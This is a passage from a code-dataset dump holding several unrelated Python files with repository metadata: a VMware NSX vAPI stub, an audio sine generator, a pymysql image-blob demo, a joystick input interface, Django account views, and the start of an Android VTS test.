] | permissive | adammillerio/vsphere-automation-sdk-python | 2b3b730db7da99f1313c26dc738b82966ecea6ce | c07e1be98615201139b26c28db3aa584c4254b66 | refs/heads/master | 2022-11-20T03:09:59.895841 | 2020-07-17T19:32:37 | 2020-07-17T19:32:37 | 280,499,136 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,908 | py | # -*- coding: utf-8 -*-
#---------------------------------------------------------------------------
# Copyright 2020 VMware, Inc. All rights reserved.
# AUTO GENERATED FILE -- DO NOT MODIFY!
#
# vAPI stub file for package com.vmware.nsx_policy.infra.tier_0s.locale_services.l2vpn_context.l2vpns.
#---------------------------------------------------------------------------
"""
"""
__author__ = 'VMware, Inc.'
__docformat__ = 'restructuredtext en'
import sys
from vmware.vapi.bindings import type
from vmware.vapi.bindings.converter import TypeConverter
from vmware.vapi.bindings.enum import Enum
from vmware.vapi.bindings.error import VapiError
from vmware.vapi.bindings.struct import VapiStruct
from vmware.vapi.bindings.stub import (
ApiInterfaceStub, StubFactoryBase, VapiInterface)
from vmware.vapi.bindings.common import raise_core_exception
from vmware.vapi.data.validator import (UnionValidator, HasFieldsOfValidator)
from vmware.vapi.exception import CoreException
from vmware.vapi.lib.constants import TaskType
from vmware.vapi.lib.rest import OperationRestMetadata
class PeerConfig(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx_policy.infra.tier_0s.locale_services.l2vpn_context.l2vpns.peer_config'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _PeerConfigStub)
self._VAPI_OPERATION_IDS = {}
def get(self,
tier0_id,
locale_service_id,
l2vpn_id,
enforcement_point_path=None,
):
"""
:type tier0_id: :class:`str`
:param tier0_id: (required)
:type locale_service_id: :class:`str`
:param locale_service_id: (required)
:type l2vpn_id: :class:`str`
:param l2vpn_id: (required)
:type enforcement_point_path: :class:`str` or ``None``
:param enforcement_point_path: String Path of the enforcement point (optional)
:rtype: :class:`com.vmware.nsx_policy.model_client.AggregateL2VpnPeerConfig`
:return: com.vmware.nsx_policy.model.AggregateL2VpnPeerConfig
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'tier0_id': tier0_id,
'locale_service_id': locale_service_id,
'l2vpn_id': l2vpn_id,
'enforcement_point_path': enforcement_point_path,
})
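# Usage sketch (assumes an already-configured vAPI StubConfiguration, here
# `stub_config`; the id values are illustrative):
#   peer_config = PeerConfig(stub_config)
#   cfg = peer_config.get(tier0_id='t0', locale_service_id='default',
#                         l2vpn_id='l2vpn-1')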
class Statistics(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx_policy.infra.tier_0s.locale_services.l2vpn_context.l2vpns.statistics'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _StatisticsStub)
self._VAPI_OPERATION_IDS = {}
def get(self,
tier0_id,
locale_service_id,
l2vpn_id,
enforcement_point_path=None,
):
"""
:type tier0_id: :class:`str`
:param tier0_id: (required)
:type locale_service_id: :class:`str`
:param locale_service_id: (required)
:type l2vpn_id: :class:`str`
:param l2vpn_id: (required)
:type enforcement_point_path: :class:`str` or ``None``
:param enforcement_point_path: String Path of the enforcement point (optional)
:rtype: :class:`com.vmware.nsx_policy.model_client.AggregateL2VpnStatistics`
:return: com.vmware.nsx_policy.model.AggregateL2VpnStatistics
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'tier0_id': tier0_id,
'locale_service_id': locale_service_id,
'l2vpn_id': l2vpn_id,
'enforcement_point_path': enforcement_point_path,
})
class _PeerConfigStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {
'tier0_id': type.StringType(),
'locale_service_id': type.StringType(),
'l2vpn_id': type.StringType(),
'enforcement_point_path': type.OptionalType(type.StringType()),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/policy/api/v1/infra/tier-0s/{tier-0-id}/locale-services/{locale-service-id}/l2vpn-context/l2vpns/{l2vpn-id}/peer-config',
path_variables={
'tier0_id': 'tier-0-id',
'locale_service_id': 'locale-service-id',
'l2vpn_id': 'l2vpn-id',
},
query_parameters={
'enforcement_point_path': 'enforcement_point_path',
},
content_type='application/json'
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx_policy.model_client', 'AggregateL2VpnPeerConfig'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx_policy.infra.tier_0s.locale_services.l2vpn_context.l2vpns.peer_config',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _StatisticsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {
'tier0_id': type.StringType(),
'locale_service_id': type.StringType(),
'l2vpn_id': type.StringType(),
'enforcement_point_path': type.OptionalType(type.StringType()),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/policy/api/v1/infra/tier-0s/{tier-0-id}/locale-services/{locale-service-id}/l2vpn-context/l2vpns/{l2vpn-id}/statistics',
path_variables={
'tier0_id': 'tier-0-id',
'locale_service_id': 'locale-service-id',
'l2vpn_id': 'l2vpn-id',
},
query_parameters={
'enforcement_point_path': 'enforcement_point_path',
},
content_type='application/json'
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx_policy.model_client', 'AggregateL2VpnStatistics'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx_policy.infra.tier_0s.locale_services.l2vpn_context.l2vpns.statistics',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class StubFactory(StubFactoryBase):
_attrs = {
'PeerConfig': PeerConfig,
'Statistics': Statistics,
}
| [
"[email protected]"
] | |
c8cfea60f10bab3d2d252c18e5e0bdbc99706d03 | 2f898bb332097d11f321186207e94f6d156587f3 | /dsp2019/classe4_dft/generar_audio.py | f41a4c4171677ad77f1be4e998e728e9ab7e47bf | [
"MIT"
] | permissive | miltonsarria/teaching | ad2d07e9cfbfcf272c4b2fbef47321eae765a605 | 7a2b4e6c74d9f11562dfe34722e607ca081c1681 | refs/heads/master | 2022-01-05T05:58:13.163155 | 2019-05-02T20:45:46 | 2019-05-02T20:45:46 | 102,375,690 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 570 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from scipy.io.wavfile import read
from scipy.io.wavfile import write
import numpy as np
import matplotlib.pyplot as plt
fs=16e3
longitud = 2 #sec
n=np.linspace(1./fs,longitud,int(fs*longitud));
F=400 #fundamental frequency
w=2*np.pi*F #angular frequency
Vm=1 #wave amplitude value
#generate a pure sinusoid
x=Vm*np.cos(w*n)
#choose a filename and save the file
filename = 'ejemplo1.wav'
write(filename,int(fs),x)
#plot the saved sinusoid
plt.plot(x)
plt.show()
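#hedged extension sketch (not in the original script): inspect the tone with the
#DFT via np.fft.rfft; the magnitude peak should land at F = 400 Hz
X = np.fft.rfft(x)
freqs = np.fft.rfftfreq(x.size, d=1./fs)
plt.plot(freqs, np.abs(X))
plt.show()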
| [
"[email protected]"
] | |
f7e3e1ceda275bc64213308ab21495cb7d97b19a | 8d2a124753905fb0455f624b7c76792c32fac070 | /pytnon-month02/month02-lvze-notes/day15-lvze/save_file.py | 9095c3857f57b6435b8db97a5bd1032e0fa61e98 | [] | no_license | Jeremy277/exercise | f38e4f19aae074c804d265f6a1c49709fd2cae15 | a72dd82eb2424e4ae18e2f3e9cc66fc4762ec8fa | refs/heads/master | 2020-07-27T09:14:00.286145 | 2019-09-17T11:31:44 | 2019-09-17T11:31:44 | 209,041,629 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 760 | py | """
save_file.py
Example of storing and retrieving binary files
"""
import pymysql
# Connect to the database
db = pymysql.connect(user='root',
password = '123456',
database = 'stu',
charset='utf8')
# Get a cursor (used to operate on the database: execute SQL statements and fetch results)
cur = db.cursor()
# Execute statements
# Store the image
with open('gakki.jpg','rb') as f:
data = f.read()
sql = "insert into images values (1,%s,%s)"
cur.execute(sql,[data,'初恋'])
db.commit()
# Retrieve the image
sql = "select photo from images \
where comment='初恋'"
cur.execute(sql)
data = cur.fetchone()[0]  # the returned tuple holds a single element
with open('gakki_get.jpg','wb') as f:
f.write(data)
# Close the cursor
cur.close()
# Close the database connection
db.close()
| [
"[email protected]"
] | |
61fb603d132eda1ba08b4a29b00a1112cafcd207 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2890/58634/237718.py | 7875c0abb4bcd7b3b6440c09767567838f31d8cb | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 511 | py | a = [int(i) for i in input().split(" ")]
n = a[0]
x = a[1]
y = a[2]
different_k = []
not_have_k = False  # lines to the origin that are perpendicular to the x-axis have no slope
for i in range(n):
b = [int(i) for i in input().split(" ")]
    x1 = b[0] - x  # shift the coordinate axes so the cannon sits at the origin
y1 = b[1] - y
if x1 == 0:
not_have_k = True
else:
if different_k.count(y1/x1) == 0:
different_k.append(y1/x1)
if not_have_k:
print(len(different_k)+1)
else:
print(len(different_k)) | [
"[email protected]"
] | |
bdecc3ccb4df935062f8509ec4904a6e1162f0a7 | 96c6273649417609f0f86df88e5e95ecd7e80d86 | /pyjoystick/interface.py | 51d162a614beefdfc9a6f2d3df4c3f902a035de8 | [
"MIT"
] | permissive | erjosito/pyjoystick | e311accb9e83d28f4325f799527270dfc3d49010 | 2b1639c17892904b191fe2ba42341a19d6f3b78e | refs/heads/master | 2023-08-31T15:19:15.019252 | 2021-10-14T19:07:49 | 2021-10-14T19:07:49 | 550,453,646 | 1 | 0 | MIT | 2022-10-12T19:48:08 | 2022-10-12T19:48:08 | null | UTF-8 | Python | false | false | 15,882 | py | from .stash import Stash
__all__ = ['KeyTypes', 'HatValues', 'Key', 'Joystick']
class KeyTypes:
"""Types of keys the controller could report (Axis, Button, Hat, Ball)."""
AXIS = "Axis"
BUTTON = "Button"
HAT = "Hat"
BALL = "Ball"
ALL_KEYTYPES = ','.join((AXIS, BUTTON, HAT, BALL))
@classmethod
def has_keytype(cls, keytype, key_types):
try:
if keytype == cls.ALL_KEYTYPES or str(keytype) in key_types:
return True
except (TypeError, ValueError, Exception):
pass
return False
class HatValues:
"""Have values and converters. Values are numbered like bit flags."""
HAT_CENTERED = 0
HAT_UP = 1
HAT_RIGHT = 2
HAT_DOWN = 4
HAT_LEFT = 8
HAT_RIGHTUP = HAT_UPRIGHT = 3
HAT_RIGHTDOWN = HAT_DOWNRIGHT = 6
HAT_LEFTUP = HAT_UPLEFT = 9
HAT_LEFTDOWN = HAT_DOWNLEFT = 12
ALL_HAT_VALUES = (HAT_CENTERED | HAT_UP | HAT_RIGHT | HAT_DOWN | HAT_LEFT |
HAT_UPRIGHT | HAT_DOWNRIGHT | HAT_UPLEFT | HAT_DOWNLEFT)
HAT_NAME_CENTERED = 'Centered'
HAT_NAME_UP = 'Up'
HAT_NAME_RIGHT = 'Right'
HAT_NAME_DOWN = 'Down'
HAT_NAME_LEFT = 'Left'
HAT_NAME_UPRIGHT = HAT_NAME_RIGHTUP = 'Up Right'
HAT_NAME_DOWNRIGHT = HAT_NAME_RIGHTDOWN = 'Down Right'
HAT_NAME_UPLEFT = HAT_NAME_LEFTUP = 'Up Left'
HAT_NAME_DOWNLEFT = HAT_NAME_LEFTDOWN = 'Down Left'
HAT_CONVERTER = {
HAT_CENTERED: HAT_NAME_CENTERED, HAT_UP: HAT_NAME_UP, HAT_RIGHT: HAT_NAME_RIGHT, HAT_DOWN: HAT_NAME_DOWN,
HAT_LEFT: HAT_NAME_LEFT, HAT_UPRIGHT: HAT_NAME_UPRIGHT, HAT_DOWNRIGHT: HAT_NAME_DOWNRIGHT,
HAT_UPLEFT: HAT_NAME_UPLEFT, HAT_DOWNLEFT: HAT_NAME_DOWNLEFT,
}
NAME_CONVERTER = {name: value for value, name in HAT_CONVERTER.items()}
HAT_TO_RANGE = {
HAT_CENTERED: (0, 0), HAT_NAME_CENTERED: (0, 0),
HAT_UP: (0, 1), HAT_NAME_UP: (0, 1),
HAT_RIGHT: (1, 0), HAT_NAME_RIGHT: (1, 0),
HAT_DOWN: (0, -1), HAT_NAME_DOWN: (0, -1),
HAT_LEFT: (-1, 0), HAT_NAME_LEFT: (-1, 0),
HAT_RIGHTUP: (1, 1), HAT_NAME_RIGHTUP: (1, 1),
HAT_RIGHTDOWN: (1, -1), HAT_NAME_RIGHTDOWN: (1, -1),
HAT_LEFTUP: (-1, 1), HAT_NAME_LEFTUP: (-1, 1),
HAT_LEFTDOWN: (-1, -1), HAT_NAME_LEFTDOWN: (-1, -1),
}
HAT_FROM_RANGE = {
(0, 0): HAT_CENTERED,
(0, 1): HAT_UP,
(1, 0): HAT_RIGHT,
(0, -1): HAT_DOWN,
(-1, 0): HAT_LEFT,
(1, 1): HAT_RIGHTUP,
(1, -1): HAT_RIGHTDOWN,
(-1, 1): HAT_LEFTUP,
(-1, -1): HAT_LEFTDOWN,
}
HAT_NAME_FROM_RANGE = {
(0, 0): HAT_NAME_CENTERED,
(0, 1): HAT_NAME_UP,
(1, 0): HAT_NAME_RIGHT,
(0, -1): HAT_NAME_DOWN,
(-1, 0): HAT_NAME_LEFT,
(1, 1): HAT_NAME_RIGHTUP,
(1, -1): HAT_NAME_RIGHTDOWN,
(-1, 1): HAT_NAME_LEFTUP,
(-1, -1): HAT_NAME_LEFTDOWN,
}
@classmethod
def convert_to_hat_name(cls, hat_value):
"""Return the given hat_value as a string name"""
return cls.HAT_CONVERTER.get(hat_value, str(hat_value))
@classmethod
def convert_to_hat_value(cls, hat_name):
"""Return the given hat_name as an integer value. If -1 is returned it is an invalid value."""
try:
value = int(hat_name)
except (TypeError, ValueError, Exception):
value = -1
return cls.NAME_CONVERTER.get(hat_name, value)
@classmethod
def as_range(cls, hat, default=None):
if default is None:
default = hat
return cls.HAT_TO_RANGE.get(hat, default)
@classmethod
def from_range(cls, hat, default=None):
if default is None:
default = hat
return cls.HAT_FROM_RANGE.get(hat, default)
@classmethod
def name_from_range(cls, hat, default=None):
if default is None:
default = hat
return cls.HAT_NAME_FROM_RANGE.get(hat, default)
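# Conversion sketch (illustrative): the diagonal value 3 (HAT_UPRIGHT) maps both ways:
#   HatValues.convert_to_hat_name(3)  -> 'Up Right'
#   HatValues.as_range(3)             -> (1, 1)
#   HatValues.from_range((1, 1))      -> 3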
class Key(object):
"""Key that the controller received. This stores the key type, value, and other properties to use."""
# Key Types
KeyTypes = KeyTypes
AXIS = KeyTypes.AXIS
BUTTON = KeyTypes.BUTTON
HAT = KeyTypes.HAT
BALL = KeyTypes.BALL
ALL_KEYTYPES = KeyTypes.ALL_KEYTYPES
has_keytype = staticmethod(KeyTypes.has_keytype)
# HAT Values (Guessing they are more bit flags than enums.)
HatValues = HatValues
HAT_CENTERED = HatValues.HAT_CENTERED
HAT_UP = HatValues.HAT_UP
HAT_RIGHT = HatValues.HAT_RIGHT
HAT_DOWN = HatValues.HAT_DOWN
HAT_LEFT = HatValues.HAT_LEFT
HAT_RIGHTUP = HAT_UPRIGHT = HatValues.HAT_UPRIGHT
HAT_RIGHTDOWN = HAT_DOWNRIGHT = HatValues.HAT_DOWNRIGHT
HAT_LEFTUP = HAT_UPLEFT = HatValues.HAT_UPLEFT
HAT_LEFTDOWN = HAT_DOWNLEFT = HatValues.HAT_DOWNLEFT
ALL_HAT_VALUES = HatValues.ALL_HAT_VALUES
HAT_NAME_CENTERED = HatValues.HAT_NAME_CENTERED
HAT_NAME_UP = HatValues.HAT_NAME_UP
HAT_NAME_RIGHT = HatValues.HAT_NAME_RIGHT
HAT_NAME_DOWN = HatValues.HAT_NAME_DOWN
HAT_NAME_LEFT = HatValues.HAT_NAME_LEFT
HAT_NAME_UPRIGHT = HAT_NAME_RIGHTUP = HatValues.HAT_NAME_UPRIGHT
HAT_NAME_DOWNRIGHT = HAT_NAME_RIGHTDOWN = HatValues.HAT_NAME_DOWNRIGHT
HAT_NAME_UPLEFT = HAT_NAME_LEFTUP = HatValues.HAT_NAME_UPLEFT
HAT_NAME_DOWNLEFT = HAT_NAME_LEFTDOWN = HatValues.HAT_NAME_DOWNLEFT
convert_to_hat_name = staticmethod(HatValues.convert_to_hat_name)
convert_to_hat_value = staticmethod(HatValues.convert_to_hat_value)
convert_to_hat_range = staticmethod(HatValues.as_range)
def __init__(self, keytype, number, value=None, joystick=None, is_repeat=False, override=False):
self.keytype = keytype
self.number = number
self.raw_value = None
self.joystick = joystick
self.is_repeat = is_repeat
self.override = override
self.set_value(value)
def get_hat_name(self):
"""Return the value as a HAT name."""
if self.keytype != self.HAT:
raise TypeError('The Key must be a HAT keytype in order to get the hat name.')
return self.convert_to_hat_name(self.raw_value)
def get_hat_range(self):
"""Return the key as a range (right[1]/left[-1], up[1]/down[-1])."""
if self.keytype != self.HAT:
            raise TypeError('The Key must be a HAT keytype in order to get the hat range.')
return self.convert_to_hat_range(self.raw_value)
def get_proper_value(self):
"""Return the value between -1 and 1. Hat values act like buttons and will be 1 or 0.
        Use get_hat_name to check which hat direction is active.
"""
if self.raw_value is None:
return 0
elif self.raw_value > 1:
return 1
return self.raw_value
def get_value(self):
"""Return the value of the key"""
if self.raw_value is None:
return 0
return self.raw_value
def set_value(self, value):
"""Set the value of the key"""
self.raw_value = value
value = property(get_value, set_value)
def update_value(self, joystick=None):
"""Set this key's value from the set or given joystick's associated key value."""
if joystick is None:
joystick = self.joystick
try:
v = joystick.get_key(self).get_value()
self.value = v
except:
pass
def copy(self):
"""Create a copy of the key."""
return self.__class__(self.keytype, self.number, self.value, self.joystick,
is_repeat=False, override=self.override)
@classmethod
def to_keyname(cls, key):
"""Return this key as a string keyname.
* Format is "{minus}{keytype} {number}".
* Hat format is "{keytype} {number} {hat_name}"
Examples
* "Axis 0" - For Axis 0 with a positive or 0 value.
* "-Axis 1" - For an Axis Key that has a negative value and needs to be inverted.
* "Button 0" - Buttons wont have negative values
* "Hat 0 [Left Up]" - Hat values also give the key value as a hat name.
"""
prefix = ''
if key.value and key.value < 0:
prefix = '-'
if key.keytype == cls.HAT:
return '{}{} {} [{}]'.format(prefix, key.keytype, key.number, key.get_hat_name())
else:
return '{}{} {}'.format(prefix, key.keytype, key.number)
@classmethod
def from_keyname(cls, keyname, joystick=None):
"""Return a new key from the given keyname."""
# Remove any joystick name attached
keyname = str(keyname)
if ':' in keyname:
keyname = keyname.split(':', 1)[-1].strip()
# Split the keyname
keytype, number = keyname.split(' ', 1)
# Check if the keyname starts with a negative.
value = None
if keytype.startswith('-'):
value = -1
keytype = keytype[1:].strip()
# Check if the number has '['
if '[' in number:
number, hat_name = number.split('[', 1)
number = number.strip()
value = int(cls.convert_to_hat_value(hat_name.replace(']', '').strip()))
number = int(number)
return Key(keytype, number, value, joystick=joystick)
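    # Round-trip sketch (illustrative): Key.from_keyname('-Axis 1').keyname == '-Axis 1',
    # and Key.from_keyname('Hat 0 [Up Left]') carries the raw value HAT_UPLEFT (9).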
@property
def keyname(self):
return self.to_keyname(self)
@keyname.setter
def keyname(self, keyname):
new_key = self.from_keyname(keyname)
self.keytype = new_key.keytype
self.number = new_key.number
if self.value:
self.value = new_key.value
def __str__(self):
return self.to_keyname(self)
def __repr__(self):
if self.joystick:
return '<{module}.{name} {joystick}: {keyname} at {id}>'.format(
module=self.__module__, name=self.__class__.__name__, id=id(self),
joystick=self.joystick, keyname=self.keyname)
else:
return '<{module}.{name} {keyname} at {id}>'.format(
module=self.__module__, name=self.__class__.__name__, id=id(self),
joystick=self.joystick, keyname=self.keyname)
def __hash__(self):
return hash('{} {}'.format(self.keytype, self.number))
def __eq__(self, other):
try:
if other.keytype == self.keytype and other.number == self.number:
# Check if joysticks match if they are not None
if other.joystick is not None and self.joystick is not None:
return other.joystick == self.joystick
return True
return False
except:
pass
try:
return str(self) == str(other)
except:
return False
class Joystick(object):
@classmethod
def get_joysticks(cls):
"""Return a list of available joysticks."""
# return []
raise NotImplementedError
def __init__(self, *args, **kwargs):
super().__init__()
# Optional predefined variables (use with __new__)
self.joystick = getattr(self, 'joystick', None) # Internal joystick object
self.identifier = getattr(self, 'identifier', -1)
self.name = getattr(self, 'name', '')
self.numaxes = getattr(self, 'numaxes', -1)
self.numbuttons = getattr(self, 'numbuttons', -1)
self.numhats = getattr(self, 'numhats', -1)
self.numballs = getattr(self, 'numballs', -1)
self.axis = getattr(self, 'axis', Stash())
self.button = getattr(self, 'button', Stash())
self.hat = getattr(self, 'hat', Stash())
self.ball = getattr(self, 'ball', Stash())
self.keys = getattr(self, 'keys', Stash(self.axis + self.button + self.hat + self.ball))
self.deadband = getattr(self, 'deadband', 0.2)
self.init_keys()
def init_keys(self):
"""Initialize the keys."""
self.axis = Stash(Key(Key.AXIS, i, None, self) for i in range(self.get_numaxes()))
self.button = Stash(Key(Key.BUTTON, i, None, self) for i in range(self.get_numbuttons()))
self.hat = Stash(Key(Key.HAT, i, None, self) for i in range(self.get_numhats()))
self.ball = Stash(Key(Key.BALL, i, None, self) for i in range(self.get_numballs()))
self.keys = Stash(self.axis + self.button + self.hat + self.ball)
def is_available(self):
"""Return if this joystick is still active and available."""
raise NotImplementedError
def close(self):
"""Close the joystick."""
raise NotImplementedError
def get_key(self, key):
"""Return the key for the given key."""
key_attr = getattr(self, str(key.keytype).lower()) # self.axis, self.button, self.hat, or self.ball
return key_attr[key.number]
def get_key_value(self, key):
"""Return the current value of this joystick's key for the given key."""
return self.get_key(key).get_value()
def update_key(self, key):
"""Update the value for a given key."""
self.get_key(key).set_value(key.value)
def get_id(self):
"""Return the joystick id."""
return self.identifier
def get_name(self):
"""Return the name of the joystick."""
return self.name
def get_numaxes(self):
"""Return the number of axes."""
return self.numaxes
    def get_axis(self, number):
        """Return the current value for the given axis."""
return self.axis[number].get_value()
def get_numbuttons(self):
"""Return the number of buttons."""
return self.numbuttons
def get_button(self, number):
"""Return the value for the given button number."""
return self.button[number].get_value()
def get_numhats(self):
"""Return the number of hats."""
return self.numhats
def get_hat(self, number):
"""Return the (hat [0], hat [1]) value for the given hat number."""
return self.hat[number].get_value()
def get_numballs(self):
"""Return the number of track balls."""
return self.numballs
    def get_ball(self, number):
        """Return the current value for the given ball."""
return self.ball[number].get_value()
def get_deadband(self):
"""Return the deadband for this joystick axis."""
return self.deadband
def set_deadband(self, value):
"""Return the deadband for this joystick axis."""
self.deadband = value
def __eq__(self, other):
name, my_id, joystick = self.get_name(), self.get_id(), self.joystick
try:
return name == other.get_name() or my_id == other or (joystick == other.joystick and joystick is not None)
except:
pass
try:
is_id = not isinstance(other, bool) and my_id == other
return is_id or name == other or (joystick == other and joystick is not None)
except:
pass
return False
def __int__(self):
return self.get_id()
def __str__(self):
return self.get_name()
def __hash__(self):
return hash('{} {}'.format(self.identifier, self.name))
def __getstate__(self):
return {
'joystick': None,
'identifier': self.identifier,
'name': self.name,
'numaxes': self.numaxes,
'numbuttons': self.numbuttons,
'numhats': self.numhats,
'numballs': self.numballs,
'axis': self.axis,
'button': self.button,
'hat': self.hat,
'ball': self.ball,
'keys': self.keys,
'deadband': self.deadband
}
def __setstate__(self, state):
for k, v in state.items():
setattr(self, k, v)
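# Hedged usage note (not part of the original class): __getstate__ nulls out
# the backend 'joystick' handle because it is not picklable, so only plain
# attributes survive a round trip; 'joy' below stands for any instance.
# import pickle
# restored = pickle.loads(pickle.dumps(joy))  # restored.joystick is None
# restored.get_id(), restored.get_name()      # plain attributes are intact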
| [
"[email protected]"
] | |
ce98326eec9e867cfa84bc1b3f0f2d96f6af855a | 8cadad50417345f84ce275d455f4d9d851adcfcb | /accounts/views.py | 77c71b57912235123ee133a106e9127927d80431 | [] | no_license | amirbigg/django-blog | b67427dc9b087937c91e62bead242690658f8584 | 23d6d47dd3e309fa736cd891654a09da18d08427 | refs/heads/master | 2023-04-28T17:35:00.298592 | 2022-02-11T18:15:47 | 2022-02-11T18:15:47 | 226,943,807 | 26 | 6 | null | 2023-04-21T21:28:17 | 2019-12-09T18:51:29 | Python | UTF-8 | Python | false | false | 1,452 | py | from django.shortcuts import render, redirect
from .forms import UserLoginForm, UserRegistrationForm
from django.contrib.auth import authenticate, login, logout
from django.contrib import messages
from django.contrib.auth.models import User
def user_login(request):
if request.method == 'POST':
form = UserLoginForm(request.POST)
if form.is_valid():
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user = authenticate(request, username=username, password=password)
if user is not None:
login(request, user)
messages.success(request, 'you logged in successfully', 'success')
return redirect('blog:all_articles')
else:
messages.error(request, 'wrong username or password', 'warning')
else:
form = UserLoginForm()
return render(request, 'accounts/login.html', {'form':form})
def user_register(request):
if request.method == 'POST':
form = UserRegistrationForm(request.POST)
if form.is_valid():
cd = form.cleaned_data
User.objects.create_user(cd['username'], cd['email'], cd['password1'])
messages.success(request, 'you registered successfully, now log in', 'success')
return redirect('accounts:user_login')
else:
form = UserRegistrationForm()
return render(request, 'accounts/register.html', {'form':form})
def user_logout(request):
logout(request)
messages.success(request, 'you logged out successfully', 'success')
return redirect('blog:all_articles') | [
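# Hedged wiring sketch (assumed companion file accounts/urls.py; the app
# namespace 'accounts' is inferred from the reverses used above):
# from django.urls import path
# from . import views
# app_name = 'accounts'
# urlpatterns = [
#     path('login/', views.user_login, name='user_login'),
#     path('register/', views.user_register, name='user_register'),
#     path('logout/', views.user_logout, name='user_logout'),
# ]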
"[email protected]"
] | |
6c47467fdc2e3ac450e09175b287eb9a071c66b8 | 4cc4d9d488939dde56fda368faf58d8564047673 | /test/vts/testcases/framework_test/SampleSl4aTest.py | 0b1133ebb0c19c335cf4b803840db478b2dc7418 | [] | no_license | Tosotada/android-8.0.0_r4 | 24b3e4590c9c0b6c19f06127a61320061e527685 | 7b2a348b53815c068a960fe7243b9dc9ba144fa6 | refs/heads/master | 2020-04-01T11:39:03.926512 | 2017-08-28T16:26:25 | 2017-08-28T16:26:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,302 | py | #!/usr/bin/env python
#
# Copyright (C) 2016 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
from vts.runners.host import base_test
from vts.runners.host import test_runner
from vts.utils.python.controllers import android_device
class SampleSl4aTest(base_test.BaseTestClass):
"""An example showing making SL4A calls in VTS."""
def setUpClass(self):
